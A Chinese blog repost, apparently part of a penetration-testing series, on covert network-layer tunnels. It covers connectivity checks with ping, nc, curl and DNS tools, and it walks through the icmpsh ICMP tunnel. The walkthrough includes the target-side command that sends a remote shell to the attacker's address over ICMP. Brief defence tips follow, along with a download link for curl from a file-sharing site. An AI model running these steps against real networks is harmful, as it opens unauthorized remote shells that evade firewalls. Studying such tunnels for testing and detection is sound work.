ipv6 访问内网_【内网渗透】—— 隐藏通信隧道技术之网络层隧道技术
hidden:是否完全隐藏控制面板,还有很多设置参数,比如也可以设置显示面板,然后设置宽高WIDTH=“整数” 和 HIGH=“整数”。
1. 隐藏通信隧道基础1.1隐藏通信隧道技术概述
常用的隧道:网络层:IPv6隧道,ICMP隧道,GRE隧道
传输层:TCP隧道,UDP隧道,常规端口转发
应用程:SSH隧道,HTTP隧道,HTTPS隧道,DNS隧道
1.2 判断内网的连通性综合判断各种协议(TCP,HTTP,DNS,ICMP)及端口通信的情况。常用的允许流量出的端口有 80,8080,443,53,110,123等。
内网连通性判断方法:
1,ICMP协议、
执行命令 "ping “
2,TCP协议
netcat(nc)誉为瑞士军刀,通过使用TCP或UDP协议的网络连接读写数据
使用nc工具,执行 nc
3,HTTP协议
curl是利用URL规则在命令行下工作的综合传输工具,
支持文件下载和上传 ,在windows系统中需要安装
命令:curl
链接:https://pan.baidu.com/s/1uBF8eDXI9nBJXB2tbqikpQ
提取码:zyx1
4,DNS协议
dns连通性,常用命令 :nslookup和dig
nslookup是windows自带 dns探测命令,在没有指定vps-ip时,nslookup会从系统网络中的TCP/IP属性中读取DNS服务器的地址
输入 nslookup 按回车键 输入 help命令。
dig是linux自带的命令 输入dig -h显示帮助信息
dig命令使用详解
2. 网络层隧道技术
在网络层中 ,两个常用的的隧道协议是IPv6 和IMCP
2.1 IPv6隧道
用来代替现行的IPv4协议的一种新IP协议
防御IPv6隧道攻击的方法
了解IPv6的具体漏洞,结合其他协议,通过防火墙和深度防御系统过滤IPv6通信,提高主机和应用程序的安全性
2.2 ICMP隧道
ICMP隧道简单,实用,是一个比较特殊的协议 常见的ICMP消息为ping命令的回复,将TCP/UDP数据封装到ICMP的ping数据据包中,穿过防火墙,实现不受限制的网络访问
** icmpsh**
使用简单不需要管理员权限
使用git clone命令下载icmpsh 下载地址
安装python的impacket类库 以便对TCP,UDP,ICMP,IGMP,ARP,IPv4,IPv6,SMB,MSRPC,NTLM,Kerbers,WML,LDAP等协议进行访问,
安装python-impacket
apt-get install python-impacket
因为icmpsh工具会替代系统本身的ping命令的应答程序,需要关闭本地系统的ICMP应答(如果要恢复系统应答,则设置为0),否则shell的运行会不稳定(表现为一直刷屏,无法进入交互输入)。
sysctl -w net.ipv4.icmp_echo_ignore_all=1
输入 ./run.sh
并运行,会提示出现输入目标的IP地址(目标主机的公网IP地址)
在目标主机上查看ip地址,输入如下命令:
icmpsh.exe -t 192.168.227.137(攻击机ip) -d 30 -s 128
在目标主机运行以上命令,即可在VPS中看到 192.168.227.133得shell。
防御ICMP隧道攻击的方法
网络管理员会阻止ICMP通信进入站点,在出站方向 ICMP通信是被允许的,目前大多数的网络和边界设备不会过滤ICMP流量
使用ICMP隧道时会产生大量的ICMP数据包,可以通过wireshark进行ICMP数据包分析,已检测恶意ICMP流量
版权声明:本文为CSDN博主「Kris Alex」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。原文链接:https://blog.csdn.net/Kris__zhang/article/details/106743675
一如既往的学习,一如既往的整理,一如即往的分享。感谢支持
【好书推荐】
2020hw系列文章整理(中秋快乐、国庆快乐、双节快乐)
HW中如何检测和阻止DNS隧道
ctf系列文章整理
日志安全系列-安全日志
【干货】流量分析系列文章整理
【干货】超全的 渗透测试系列文章整理
【干货】持续性更新-内网渗透测试系列文章
【干货】android安全系列文章整理
扫描关注LemonSec
ipv6 访问内网_【内网渗透】—— 隐藏通信隧道技术之网络层隧道技术相关推荐
- mysql断网_断网的情况上如何访问本机的mysql
断网的情况下怎么访问本机的mysql 我发现把网络断掉后mysql就不能访问了. 使用phpmyadmin(http://localhost/phpmyadmin/index.php?)访问,输入用户 ...
- python numpy官网_官网Numpy教程
一: 简单介绍 numpy 的主要对象是同类型的多维数组.它通常是以表格的形式存在,表格里面的元素具有相同的类型,可以通过含正整数的元组索引到相应的元素.在NumPy中,维度被叫做轴 例如,一个3维的 ...
- 进入贝壳网_贝壳网app下载安装
贝壳网app是一款专为全国中小学生打造的教育交流平台应用,该平台提供一站式信息教育信息服务,用户可通过该平台组织或参与各种教学比赛以及特长竞赛,有兴趣的童靴欢迎在下载使用! 官方介绍 网壳网.贝壳活动 ...
- unity 配置内购_内购推荐 (IAP Promo)
应用商店扩展 内购推荐 (IAP Promo) 集成 内购推荐 (IAP Promo) 概述 内购推荐 (IAP Promo) 让开发者可以轻松促进应用内购.使用内购推荐可以在游戏中的不同位置向不同玩 ...
- mysql什么是外循环和内循环_内循环与外循环
展开全部 关于for循环嵌套作如下解释:首先内层循环属于外层循环循环体62616964757a686964616fe58685e5aeb931333365643033的一部分,当循环体执行完以后外层循 ...
- 外网怎么访问内网_神卓互联搭建远程桌面和web应用(很详细)
外网怎么访问内网_神卓互联搭建远程桌面和web应用,我们都知道国内IP资源严重不足,导致运营商商们都不给固定的IP,都是动态分配的,现在基本的已经是100或者10开头的局域网的IP,运营商的ADSL网 ...
- scaner 从外网到内网域渗透
scaner 从外网到内网域渗透 本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精:本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿 ...
- scaner从外网到内网域渗透笔记
scaner 从外网到内网域渗透 1.环境配置 1.1靶场信息 用到的虚拟机共有三个 分别是 12server-db .12-dc .web1 12server-db.web1 这两个可以使用桥接或者 ...
- 内网渗透之隐藏通信隧道
前言 在实际的网络中,通常会通过各种边界设备.软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断. 那么什么是隧道呢?隧道就是一种绕过端口屏蔽的通信方式.防火墙两端的数 ...
最新文章
- 使用钩子函数[4] - 钩子链和 CallNextHookEx 的返回值
- JS中的NaN和isNaN,简直是双重人格?
- 四人帮–代理设计模式
- mysql的记录操作的日志文件_MySql 的操作日志 历史记录
- IJCAI 2019 | 为推荐系统生成高质量的文本解释:基于互注意力机制的多任务学习模型...
- 《高性能MySQL-第三版》 的总评价
- 信息安全原理复习资料
- MFC控件-Spin控件和编辑框控件Edit Control绑定使用
- Python 多维数据可视化
- 转: 诺贝尔奖得主:东亚教育浪费了太多生命
- 计算机二级第二课堂学记录表,第二课堂学分/第二课堂学分是什么?大学第二课堂学分不够...
- Linux面试题大全(带答案的哦)
- 用pandas和numpy分析药店的营业数据
- 微信支付横空出世,闲扯一番自我扫盲(转)
- OneHotEncoder独热编码
- 大英百科挂了,维基百科赢了
- 线性代数笔记10——矩阵的LU分解
- json对象的遍历(C++)
- 【观察】助力5G云边协同应用落地,烽火通信的突破与创新
- Android 10.0 行为变更(一)针对所有 API 级别的应用